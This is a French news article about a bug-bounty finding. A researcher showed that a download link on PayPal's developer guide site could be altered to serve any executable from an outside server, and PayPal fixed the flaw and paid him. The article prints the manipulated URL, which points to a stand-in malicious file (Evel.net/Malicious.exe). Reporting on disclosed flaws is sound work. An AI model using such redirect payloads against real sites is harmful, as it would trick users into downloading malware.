Publié par UnderNews Actu - Télécharger l'application Android
HMA Pro VPN

Le hacker Jamal Eddine s’en prend à l’API de PayPal et découvre un moyen d’infecter les utilisateurs via une manipulation d’URL de redirection. L’équipe sécurité de PayPal s’est empressée de corriger la vulnérabilité et de récompensé le chercheur indépendant.

La manipulation d’une URL de redirection a permis au hacker Jamal Eddine d’exploiter l’API PayPal afin de faire télécharger un exécutable malveillant aux utilisateurs. Tout est parti de cet espace dédié au guide d’intégration de l’API PayPal. Il a ensuite utiliser le lien de téléchargement (qui n’est plus disponible depuis la correction, ndlr) : https://devtools-paypal.com/guide/download/java?name=GetAuthorizationURL

paypal1A savoir, le clique générait le téléchargement d’un applet JAVA :

PAYPAL2

Ensuite, l’exploitation a pu commencer. Jamal a découvert qu’en modifiant l’URL de cette façon, il était tout à fait possible de servir un fichier malveillant exécutable quelconque, y compris depuis une source externe !

https://devtools-paypal.com/guide/download/?name=http://Evel.net/Malicious.exe

paypal3

Il a ensuite immédiatement averti le service sécurité de PayPal qui s’est empressé de corriger cette vulnérabilité. Au passage, Jamal a été récompensé via le programme PayPal Bug Bounty pour sa découverte et son rapport.

Le processus décrit ci-dessus a été publié en détail par le chercheur sur son blog.

Vous avez aimé cet article ? Alors partagez-le en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin Pinterest email
1 étoile2 étoiles3 étoiles4 étoiles5 étoiles (5 votes, note : 4,80 sur 5)
Loading...

Mots clés : , , , , , , , ,


Vos réactions

Ils parlent du sujet :

  1. PayPal corrige une importante vulnérabil...

    […] Le hacker Jamal Eddine s’en prend à l’API de PayPal et découvre un moyen d’infecter les utilisateurs via une manipulation d’URL de redirection. L’équipe sécurité de PayPal s’est empressée de corriger la vulnérabilité et de récompensé le chercheur indépendant.La manipulation d’une URL de redirection a permis au hacker Jamal Eddine d’exploiter l’API PayPal afin de faire télécharger un exécutable malveillant aux utilisateurs. Tout est parti de cet espace dédié au guide d’intégration de l’API PayPal. Il a ensuite utiliser le lien de téléchargement (qui n’est plus disponible depuis la correction, ndlr) : https://devtools-paypal.com/guide/download/java?name=GetAuthorizationURL  […]





Notifiez-moi des commentaires à venir via e-mail. Vous pouvez aussi vous abonner sans commenter.